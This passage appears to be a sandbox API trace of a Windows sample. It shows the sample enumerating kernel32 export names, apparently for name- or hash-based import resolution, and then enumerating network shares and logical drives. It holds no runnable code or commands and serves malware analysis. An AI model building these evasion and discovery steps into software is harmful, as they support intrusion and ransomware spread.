lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0178.261] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0178.261] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0178.261] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0178.261] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0178.261] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0178.261] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0178.261] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0178.261] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0178.261] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0178.261] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0178.261] lstrlenA (lpString="CREATETHREAD") returned 12 [0178.261] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0178.261] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0178.261] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0178.261] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0178.262] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0178.262] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0178.262] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0178.262] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0178.262] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0178.262] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0178.262] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0178.262] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0178.262] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0178.262] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0178.262] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0178.262] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0178.262] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0178.262] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0178.262] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0178.262] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0178.262] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0178.262] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0178.262] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0178.262] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0178.262] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0178.262] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0178.262] lstrcpyA (in: lpString1=0x239e328, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0178.262] lstrlenA (lpString="CTRLROUTINE") returned 11 [0178.262] lstrcpyA (in: lpString1=0x239e328, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0178.262] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0178.262] lstrcpyA (in: lpString1=0x239e328, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0178.262] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0178.262] lstrcpyA (in: lpString1=0x239e328, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0178.262] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0178.262] lstrcpyA (in: lpString1=0x239e328, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0178.262] lstrlenA (lpString="DEBUGBREAK") returned 10 [0178.262] lstrcpyA (in: lpString1=0x239e328, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0178.262] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0178.262] lstrcpyA (in: lpString1=0x239e328, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0178.262] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0178.262] lstrcpyA (in: lpString1=0x239e328, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0178.262] lstrlenA (lpString="DECODEPOINTER") returned 13 [0178.263] lstrcpyA (in: lpString1=0x239e328, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0178.263] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0178.263] lstrcpyA (in: lpString1=0x239e328, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0178.263] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0178.263] lstrcpyA (in: lpString1=0x239e328, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0178.263] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0178.263] lstrcpyA (in: lpString1=0x239e328, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0178.263] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0178.263] lstrcpyA (in: lpString1=0x239e328, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0178.263] lstrlenA (lpString="DELETEATOM") returned 10 [0178.263] lstrcpyA (in: lpString1=0x239e328, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0178.263] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0178.263] lstrcpyA (in: lpString1=0x239e328, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0178.263] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0178.263] lstrcpyA (in: lpString1=0x239e328, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0178.263] lstrlenA (lpString="DELETEFIBER") returned 11 [0178.263] lstrcpyA (in: lpString1=0x239e328, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0178.263] lstrlenA (lpString="DELETEFILEA") returned 11 [0178.263] lstrcpyA (in: lpString1=0x239e328, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0178.263] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0178.263] lstrcpyA (in: lpString1=0x239e328, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0178.263] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0178.263] lstrcpyA (in: lpString1=0x239e328, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0178.263] lstrlenA (lpString="DELETEFILEW") returned 11 [0178.263] lstrcpyA (in: lpString1=0x239e328, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0178.263] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0178.263] lstrcpyA (in: lpString1=0x239e328, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0178.263] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0178.263] lstrcpyA (in: lpString1=0x239e328, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0178.263] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0178.263] lstrcpyA (in: lpString1=0x239e328, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0178.263] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0178.263] lstrcpyA (in: lpString1=0x239e328, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0178.263] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0178.263] lstrcpyA (in: lpString1=0x239e328, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0178.263] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0178.263] lstrcpyA (in: lpString1=0x239e328, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0178.264] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0178.264] lstrcpyA (in: lpString1=0x239e328, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0178.264] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0178.264] lstrcpyA (in: lpString1=0x239e328, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0178.264] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0178.264] lstrcpyA (in: lpString1=0x239e328, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0178.264] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0178.264] lstrcpyA (in: lpString1=0x239e328, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0178.264] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0178.264] lstrcpyA (in: lpString1=0x239e328, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0178.264] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0178.264] lstrcpyA (in: lpString1=0x239e328, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0178.264] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0178.264] lstrcpyA (in: lpString1=0x239e328, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0178.264] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0178.264] lstrcpyA (in: lpString1=0x239e328, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0178.264] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0178.264] lstrcpyA (in: lpString1=0x239e328, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0178.264] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0178.264] lstrcpyA (in: lpString1=0x239e328, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0178.264] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0178.264] lstrcpyA (in: lpString1=0x239e328, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0178.264] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0178.264] lstrcpyA (in: lpString1=0x239e328, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0178.264] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0178.264] lstrcpyA (in: lpString1=0x239e328, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0178.264] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0178.264] lstrcpyA (in: lpString1=0x239e328, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0178.264] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0178.264] lstrcpyA (in: lpString1=0x239e328, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0178.264] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0178.264] lstrcpyA (in: lpString1=0x239e328, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0178.264] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0178.264] lstrcpyA (in: lpString1=0x239e328, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0178.264] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0178.264] lstrcpyA (in: lpString1=0x239e328, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0178.264] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0178.265] lstrcpyA (in: lpString1=0x239e328, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0178.265] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0178.265] lstrcpyA (in: lpString1=0x239e328, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0178.265] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0178.265] lstrcpyA (in: lpString1=0x239e328, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0178.265] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0178.265] lstrcpyA (in: lpString1=0x239e328, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0178.265] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0178.265] lstrcpyA (in: lpString1=0x239e328, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0178.265] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0178.265] lstrcpyA (in: lpString1=0x239e328, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0178.265] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0178.265] lstrcpyA (in: lpString1=0x239e328, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0178.265] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0178.265] lstrcpyA (in: lpString1=0x239e328, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0178.265] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0178.265] lstrcpyA (in: lpString1=0x239e328, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0178.265] lstrlenA (lpString="ENUMDATEFORMATSW") returned 16 [0178.265] lstrcpyA (in: lpString1=0x239e328, lpString2="EnumLanguageGroupLocalesA" | out: lpString1="EnumLanguageGroupLocalesA") returned="EnumLanguageGroupLocalesA" [0178.266] WNetEnumResourceW (in: hEnum=0x479638, lpcCount=0x239efbc, lpBuffer=0x2d0000, lpBufferSize=0x239efb4 | out: lpcCount=0x239efbc, lpBuffer=0x2d0000, lpBufferSize=0x239efb4) returned 0x0 [0178.266] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x13, lpNetResource=0x2d0000, lphEnum=0x239ef88 | out: lphEnum=0x239ef88*=0xffffffff) returned 0x4c6 [0178.269] WNetEnumResourceW (in: hEnum=0x479638, lpcCount=0x239efbc, lpBuffer=0x2d0000, lpBufferSize=0x239efb4 | out: lpcCount=0x239efbc, lpBuffer=0x2d0000, lpBufferSize=0x239efb4) returned 0x103 [0178.270] WNetCloseEnum (hEnum=0x479638) returned 0x0 [0178.273] GetLogicalDriveStringsW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x5 [0178.276] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2d0000 [0178.276] GetLogicalDriveStringsW (in: nBufferLength=0x5, lpBuffer=0x2d0000 | out: lpBuffer="C:\\") returned 0x4 [0178.276] lstrlenA (lpString="kernel32.dll") returned 12 [0178.276] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0178.277] lstrcpyA (in: lpString1=0x239e340, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0178.277] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0178.277] lstrcpyA (in: lpString1=0x239e340, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0178.277] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0178.277] lstrcpyA (in: lpString1=0x239e340, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0178.277] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0178.277] lstrcpyA (in: lpString1=0x239e340, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0178.277] lstrlenA (lpString="ADDATOMA") returned 8 [0178.277] lstrcpyA (in: lpString1=0x239e340, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0178.277] lstrlenA (lpString="ADDATOMW") returned 8 [0178.277] lstrcpyA (in: lpString1=0x239e340, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0178.277] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0178.277] lstrcpyA (in: lpString1=0x239e340, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0178.277] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0178.277] lstrcpyA (in: lpString1=0x239e340, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0178.277] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0178.277] lstrcpyA (in: lpString1=0x239e340, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0178.277] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0178.277] lstrcpyA (in: lpString1=0x239e340, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0178.277] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0178.277] lstrcpyA (in: lpString1=0x239e340, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0178.277] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0178.277] lstrcpyA (in: lpString1=0x239e340, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0178.277] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0178.277] lstrcpyA (in: lpString1=0x239e340, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0178.277] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0178.277] lstrcpyA (in: lpString1=0x239e340, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0178.277] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0178.277] lstrcpyA (in: lpString1=0x239e340, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0178.277] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0178.277] lstrcpyA (in: lpString1=0x239e340, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0178.277] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0178.277] lstrcpyA (in: lpString1=0x239e340, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0178.277] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0178.277] lstrcpyA (in: lpString1=0x239e340, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0178.277] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0178.277] lstrcpyA (in: lpString1=0x239e340, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0178.277] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0178.278] lstrcpyA (in: lpString1=0x239e340, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0178.278] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0178.278] lstrcpyA (in: lpString1=0x239e340, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0178.278] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0178.278] lstrcpyA (in: lpString1=0x239e340, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0178.278] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0178.278] lstrcpyA (in: lpString1=0x239e340, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0178.278] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0178.278] lstrcpyA (in: lpString1=0x239e340, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0178.278] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0178.278] lstrcpyA (in: lpString1=0x239e340, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0178.278] lstrlenA (lpString="BACKUPREAD") returned 10 [0178.278] lstrcpyA (in: lpString1=0x239e340, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0178.278] lstrlenA (lpString="BACKUPSEEK") returned 10 [0178.278] lstrcpyA (in: lpString1=0x239e340, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0178.278] lstrlenA (lpString="BACKUPWRITE") returned 11 [0178.278] lstrcpyA (in: lpString1=0x239e340, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0178.278] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0178.278] lstrcpyA (in: lpString1=0x239e340, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0178.278] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0178.278] lstrcpyA (in: lpString1=0x239e340, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0178.278] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0178.278] lstrcpyA (in: lpString1=0x239e340, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0178.278] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0178.278] lstrcpyA (in: lpString1=0x239e340, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0178.278] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0178.278] lstrcpyA (in: lpString1=0x239e340, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0178.278] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0178.278] lstrcpyA (in: lpString1=0x239e340, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0178.278] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0178.278] lstrcpyA (in: lpString1=0x239e340, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0178.278] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0178.278] lstrcpyA (in: lpString1=0x239e340, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0178.278] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0178.278] lstrcpyA (in: lpString1=0x239e340, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0178.278] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0178.278] lstrcpyA (in: lpString1=0x239e340, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0178.278] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0178.279] lstrcpyA (in: lpString1=0x239e340, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0178.279] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0178.279] lstrcpyA (in: lpString1=0x239e340, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0178.279] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0178.279] lstrcpyA (in: lpString1=0x239e340, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0178.279] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0178.279] lstrcpyA (in: lpString1=0x239e340, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0178.279] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0178.279] lstrcpyA (in: lpString1=0x239e340, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0178.279] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0178.279] lstrcpyA (in: lpString1=0x239e340, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0178.279] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0178.279] lstrcpyA (in: lpString1=0x239e340, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0178.279] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0178.279] lstrcpyA (in: lpString1=0x239e340, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0178.279] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0178.279] lstrcpyA (in: lpString1=0x239e340, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0178.279] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0178.279] 